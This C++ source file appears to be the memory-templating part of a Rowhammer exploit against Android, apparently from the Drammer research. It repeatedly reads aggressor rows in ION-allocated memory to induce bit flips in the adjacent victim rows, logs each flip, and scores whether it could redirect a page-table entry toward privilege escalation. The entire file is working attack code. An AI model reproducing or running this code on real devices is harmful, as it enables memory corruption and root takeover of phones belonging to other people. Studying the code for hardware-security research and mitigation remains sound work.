templating.cc
16.4 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
/*
* Copyright 2016, Victor van der Veen
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <assert.h>
#include <stdlib.h>
#include "ion.h"
#include "rowsize.h"
#include "templating.h"
extern int rowsize;
#define PAGES_PER_ROW (rowsize / PAGESIZE)
#define FLIP_DIRECTION_STR(x) (((x) == ONE_TO_ZERO) ? "1-to-0" : "0-to-1")
//#define DEBUG
#ifdef DEBUG
#define dprintf(...) printf(__VA_ARGS__)
#else
#define dprintf(...) do {} while (0)
#endif
int spc_flips = 0;
bool is_exploitable(struct template_t *tmpl) {
int rows_per_chunk = tmpl->ion_len / rowsize;
dprintf("- bits flipped : %6d\n", tmpl->bits_set);
if (tmpl->bits_set != 1) {
dprintf("[ :( ] We support only single flips\n");
return false;
}
dprintf("- index in page table: %6d\n", tmpl->word_index_in_pt);
if (tmpl->word_index_in_pt < 0) {
dprintf("[ :( ] Flip will never fall in hardware page table\n");
return false;
}
dprintf("- index in word : %6d\n", tmpl->bit_index_in_word);
if (tmpl->bit_index_in_word < 12) {
dprintf("[ :( ] Flip is in properties of PTE\n");
return false;
}
dprintf("- flip direction : %s\n", FLIP_DIRECTION_STR(tmpl->direction));
dprintf("- relative target pfn: %6d (row: %6d, idx: %2d, 16k: %6d)\n", tmpl->target_pfn, tmpl->target_pfn_row, tmpl->target_page_index_in_row, tmpl->target_16k_pfn);
dprintf("- relative source pfn: %6d (row: %6d, idx: %2d, 16k: %6d)\n", tmpl->source_pfn, tmpl->source_pfn_row, tmpl->source_page_index_in_row, tmpl->source_16k_pfn);
if (tmpl->source_pfn_row < 0 || tmpl->source_pfn_row >= rows_per_chunk) {
dprintf("[ :( ] Flip offset requires illegal source pfn\n");
return false;
}
if (tmpl->direction == ZERO_TO_ONE) {
/* A 0-to-1 flip in the PTE acts as an addition. If the new PFN (the
* page table) is in the same row as the old PFN (the mapped ION data chunk),
* it should be (1) ahead of the old one, and (2) fall in a different
* 'minimum ION chunk boundary' (dictated by what ION allocations go
* through slab, usually < 16K). */
if (tmpl->source_pfn_row == tmpl->target_pfn_row) {
if (tmpl->source_16k_pfn >= tmpl->target_16k_pfn) {
dprintf("[ :( ] Target 16k pfn not after source 16k pfn\n");
return false;
}
} else if (tmpl->source_pfn_row > tmpl->target_pfn_row) {
dprintf("[ :( ] Target row not after source row\n");
return false;
}
} else {
/* A 1-to-0 flip in the PTE acts as an addition, so it's all backwards
* now */
if (tmpl->source_pfn_row == tmpl->target_pfn_row) {
if (tmpl->source_16k_pfn <= tmpl->target_16k_pfn) {
dprintf("[ :( ] Target 16k pfn not before source 16k pfn\n");
return false;
}
} else if (tmpl->source_pfn_row < tmpl->target_pfn_row) {
dprintf("[ :( ] Target row not before source row\n");
return false;
}
}
dprintf("[ :) ] FLIP MIGHT BE EXPLOITABLE!\n");
return true;
}
bool template_exists(std::vector<struct template_t *> &templates,
uintptr_t virt, uint32_t org_byte, uint32_t new_byte) {
for (auto tmpl : templates) {
if (tmpl->virt_addr == virt &&
tmpl->org_byte == org_byte &&
tmpl->new_byte == new_byte) return true;
}
return false;
}
void handle_flip(uint8_t *virt_row,
uintptr_t *virt_above,
uintptr_t *virt_below,
uint8_t *pattern,
std::vector<struct template_t *> &templates, int index_in_row, struct ion_data *chunk) {
struct template_t *tmpl = (struct template_t *) malloc(sizeof(struct template_t));
tmpl->virt_row = (uintptr_t) virt_row;
tmpl->virt_addr = (uintptr_t) virt_row + index_in_row;
tmpl->phys_addr = (uintptr_t) get_phys_addr(tmpl->virt_addr);
tmpl->virt_page = (uintptr_t) (tmpl->virt_addr / PAGESIZE) * PAGESIZE;
tmpl->virt_above = (uintptr_t) virt_above;
tmpl->virt_below = (uintptr_t) virt_below;
tmpl->org_byte = (uint8_t) pattern[index_in_row];
tmpl->new_byte = (uint8_t) virt_row[index_in_row];
tmpl->org_word = (uint32_t) ((uint32_t *) pattern)[index_in_row / 4];
tmpl->new_word = (uint32_t) ((uint32_t *)virt_row)[index_in_row / 4];
tmpl->xorred_byte = tmpl->org_byte ^ tmpl->new_byte;
tmpl->xorred_word = tmpl->org_word ^ tmpl->new_word;
tmpl->bits_set = __builtin_popcount(tmpl->xorred_word);
tmpl->byte_index_in_row = index_in_row;
tmpl->byte_index_in_page = index_in_row % PAGESIZE;
tmpl->word_index_in_page = tmpl->byte_index_in_page / 4;
tmpl->word_index_in_pt = tmpl->word_index_in_page - 512;
tmpl->bit_index_in_word = ffs(tmpl->xorred_word) - 1;
tmpl->org_bit = (tmpl->org_word & tmpl->xorred_word) >> tmpl->bit_index_in_word;
tmpl->direction = tmpl->org_bit ? ONE_TO_ZERO : ZERO_TO_ONE;
tmpl->ion_chunk = chunk;
tmpl->ion_len = chunk->len;
tmpl->rel_address = (uintptr_t) tmpl->virt_addr - (uintptr_t) tmpl->ion_chunk->mapping;
tmpl->rel_row_index = tmpl->rel_address / rowsize;
tmpl->rel_pfn = tmpl->rel_address / PAGESIZE;
tmpl->target_pfn = tmpl->rel_pfn;
tmpl->source_pfn = tmpl->target_pfn ^ (1 << (tmpl->bit_index_in_word - 12));
tmpl->target_pfn_row = tmpl->target_pfn / PAGES_PER_ROW;
tmpl->source_pfn_row = tmpl->source_pfn / PAGES_PER_ROW;
tmpl->target_pte = tmpl->target_pfn << 12;
tmpl->source_pte = tmpl->source_pfn << 12;
tmpl->target_page_index_in_row = tmpl->target_pfn - (tmpl->target_pfn_row * PAGES_PER_ROW);
tmpl->source_page_index_in_row = tmpl->source_pfn - (tmpl->source_pfn_row * PAGES_PER_ROW);
tmpl->target_16k_pfn = tmpl->target_pfn / 4;
tmpl->source_16k_pfn = tmpl->source_pfn / 4;
tmpl->found_at = time(NULL);
print("[FLIP] i:%p l:%d v:%p p:%p b:%5d 0x%08x != 0x%08x s:%d",
tmpl->ion_chunk->mapping,
tmpl->ion_len,
(void *) tmpl->virt_addr,
(void *) tmpl->phys_addr,
tmpl->byte_index_in_row,
tmpl->org_word,
tmpl->new_word,
tmpl->found_at);
printf("\n");
tmpl->maybe_exploitable = is_exploitable(tmpl);
if (global_of) {
if (tmpl->maybe_exploitable) fprintf(global_of, "!\n");
else fprintf(global_of,"\n");
}
templates.push_back(tmpl);
}
int get_exploitable_flip_count(std::vector<struct template_t *> &templates) {
int count = 0;
for (auto tmpl : templates) {
if (tmpl->maybe_exploitable) count++;
}
return count;
}
int get_direction_flip_count(std::vector<struct template_t *> &templates, int direction) {
int count = 0;
for (auto tmpl : templates) {
if (tmpl->direction == direction) count++;
}
return count;
}
struct template_t * get_first_exploitable_flip(std::vector<struct template_t *> &templates) {
for (auto tmpl : templates) {
if (tmpl->maybe_exploitable) return tmpl;
}
return NULL;
}
int find_flips_in_row(std::vector<struct template_t *> &templates, uintptr_t phys1) {
int flips = 0;
for (auto tmpl : templates) {
if (tmpl->phys_addr >= phys1 && tmpl->phys_addr < (phys1 + rowsize)) flips++;
}
return flips;
}
int do_hammer(uint8_t *virt_row,
volatile uintptr_t *virt_above,
volatile uintptr_t *virt_below,
uint8_t *pattern_above,
uint8_t *pattern,
uint8_t *pattern_below,
std::vector<struct template_t *> &templates, struct ion_data *chunk,
int hammer_readcount) {
int new_flips = 0;
/* write pattern to victim row */
memcpy(virt_row, pattern, rowsize);
/* hammer */
uint64_t t1 = get_ns();
for (int i = 0; i < hammer_readcount; i++) {
*virt_above;
*virt_below;
}
uint64_t t2 = get_ns();
int ns_per_read = (t2 - t1) / (hammer_readcount * 2);
uint8_t *row_above = (uint8_t *) ((uintptr_t) virt_row - rowsize);
uint8_t *row_below = (uint8_t *) ((uintptr_t) virt_row + rowsize);
/* compare bytes of the victim row again the original pattern */
for (int i = 0; i < rowsize; i++) {
if (virt_row[i] != pattern[i] ) {
if (template_exists(templates, (uintptr_t) virt_row + i, pattern[i], virt_row[i])) continue;
new_flips++;
if (new_flips == 1) printf("\n");
handle_flip(virt_row,
(uintptr_t *) virt_above,
(uintptr_t *) virt_below,
pattern, templates, i, chunk);
}
if (row_above[i] != pattern_above[i] ) {
spc_flips++;
new_flips++;
if (new_flips == 1) printf("\n");
print("[SPECIAL FLIP] v:%p 0x%08x != 0x%08x\n", (uintptr_t) virt_above + i, virt_above[i], pattern_above[i]);
}
if (row_below[i] != pattern_below[i]) {
spc_flips++;
new_flips++;
if (new_flips == 1) printf("\n");
print("[SPECIAL FLIP] v:%p 0x%08x != 0x%08x\n", (uintptr_t) virt_below + i, virt_below[i], pattern_below[i]);
}
}
if (new_flips > 0)
printf("[TMPL - deltas] virtual row %d: ", (uintptr_t) virt_row / rowsize);
return ns_per_read;
}
bool times_up;
void alarm_handler(int signal) {
printf("\n[TIME] is up, wrapping up\n");
times_up = true;
}
/* Perform 'conservative' rowhammer: we hammer each page in a row. The figure
* below - row size of 32K = 8 pages - illustrates a victim row (pages P1 .. P8)
* and its two aggressor rows (above, pages A1 .. A8, and below, pages B1 ..
* B8). We write patterns to the entire rows (using <*_row>) and then
* hammer pages by reading from <virt_above> and <virt_below>.
*
* /-- <above_row>
* | /-- <virt_above>
* | ----------+------------------------------
* \--->| A1 | A2 | A3 | A4 | A5 | A6 | A7 | A8 |
* -----------------------------------------
* /--->| P1 | P2 | P3 | P4 | P5 | P6 | P7 | P8 |<-- victim row
* | -----------------------------------------
* | /->| B1 | B2 | B3 | B4 | B5 | B6 | B7 | B8 |
* | | ----------+------------------------------
* | | \-- <virt_below>
* | \-- <below_row>
* \-- <virt_row>
*/
void TMPL_run(std::vector<struct ion_data *> &chunks,
std::vector<struct template_t *> &templates,
std::vector<struct pattern_t *> &patterns, int timer, int hammer_readcount,
bool do_conservative) {
int bytes_hammered = 0;
std::vector<uint64_t> readtimes;
if (timer) {
printf("[TMPL] Setting alarm in %d seconds\n", timer);
signal(SIGALRM, alarm_handler);
alarm(timer);
}
times_up = false;
int bytes_allocated = 0;
for (auto chunk : chunks) {
bytes_allocated += chunk->len;
}
time_t start_time = time(NULL);
print("[TMPL] - Bytes allocated: %d (%d MB)\n", bytes_allocated, bytes_allocated / 1024 / 1024);
print("[TMPL] - Time: %d\n", start_time);
print("[TMPL] - Start templating\n");
for (auto chunk : chunks) {
ION_get_hammerable_rows(chunk);
for (auto virt_row : chunk->hammerable_rows) {
uintptr_t phys_row = get_phys_addr(virt_row);
int virt_row_index = virt_row / rowsize;
int phys_row_index = phys_row / rowsize;
int median_readtime = compute_median(readtimes);
int seconds_passed = time(NULL) - start_time;
int flips = templates.size();
int exploitable_flips = get_exploitable_flip_count(templates);
double kb_per_flip, percentage_exploitable;
int to0, to1;
if (flips > 0) {
kb_per_flip = (bytes_hammered / 1024) / (double) flips;
percentage_exploitable = (double) exploitable_flips / (double) flips * 100.0;
to0 = get_direction_flip_count(templates, ONE_TO_ZERO);
to1 = get_direction_flip_count(templates, ZERO_TO_ONE);
} else {
kb_per_flip = 0.0;
percentage_exploitable = 0.0;
to0 = 0;
to1 = 0;
}
print("[TMPL - status] flips: %d | expl: %d | hammered: %d | runtime: %d | median: %d | kb_per_flip: %5.2f | perc_expl: %5.2f | special: %d | 0-to-1: %d | 1-to-0: %d\n",
flips, exploitable_flips, bytes_hammered, seconds_passed, median_readtime, kb_per_flip, percentage_exploitable, spc_flips, to1, to0);
print("[TMPL - hammer] virtual row %d: %p | physical row %d: %p\n",
virt_row_index, virt_row, phys_row_index, phys_row);
printf("[TMPL - deltas] virtual row %d: ", (uintptr_t) virt_row_index);
uintptr_t above_row = virt_row - rowsize;
uintptr_t below_row = virt_row + rowsize;
int step = PAGESIZE;
if (do_conservative)
step = 64;
for (int offset = 0; offset < rowsize; offset += step) {
uintptr_t virt_above = above_row + offset;
uintptr_t virt_below = below_row + offset;
printf("|");
for (auto pattern: patterns) {
/* write patterns to the adjacent rows and hammer */
memcpy((void *) above_row, pattern->above, rowsize);
memcpy((void *) below_row, pattern->below, rowsize);
int delta = do_hammer( (uint8_t *) virt_row,
(volatile uintptr_t *) virt_above,
(volatile uintptr_t *) virt_below,
pattern->above, pattern->victim, pattern->below, templates, chunk, hammer_readcount);
readtimes.push_back(delta);
printf("%d|", delta);
pattern->cur_use++;
if (pattern->max_use && pattern->cur_use >= pattern->max_use) {
if (pattern->reset_above) pattern->reset_above (pattern->above);
if (pattern->reset_victim) pattern->reset_victim(pattern->victim);
if (pattern->reset_below) pattern->reset_below (pattern->below);
pattern->cur_use = 0;
}
}
printf(" ");
bytes_hammered += step;
if (times_up) break;
}
printf("\n");
if (times_up) break;
}
if (times_up) break;
/* clean */
ION_clean(chunk);
}
int median_readtime = compute_median(readtimes);
printf("\n[TMPL] Done templating\n");
int flips = templates.size();
print("[TMPL] - bytes hammered: %d (%d MB)\n", bytes_hammered, bytes_hammered / 1024 / 1024);
print("[TMPL] - median readtime: %d\n", median_readtime);
print("[TMPL] - unique flips: %d (1-to-0: %d / 0-to-1: %d)\n", flips,
get_direction_flip_count(templates, ONE_TO_ZERO),
get_direction_flip_count(templates, ZERO_TO_ONE));
if (flips > 0) {
double kb_per_flip = (bytes_hammered / 1024) / (double) flips;
printf("[TMPL] - kb per flip: %5.2f\n", kb_per_flip);
}
int exploitable_flips = get_exploitable_flip_count(templates);
print("[TMPL] - exploitable flips: %d\n", exploitable_flips);
if (exploitable_flips > 0) {
print("[TMPL] - first exploitable flip found after: %d seconds\n", get_first_exploitable_flip(templates)->found_at - start_time);
double percentage_exploitable = (double) exploitable_flips / (double) flips * 100.0;
printf("[TMPL] - percentage of flips that are exploitable: %5.2f\n", percentage_exploitable);
}
print("[TMPL] - time spent: %d seconds\n", time(NULL) - start_time);
}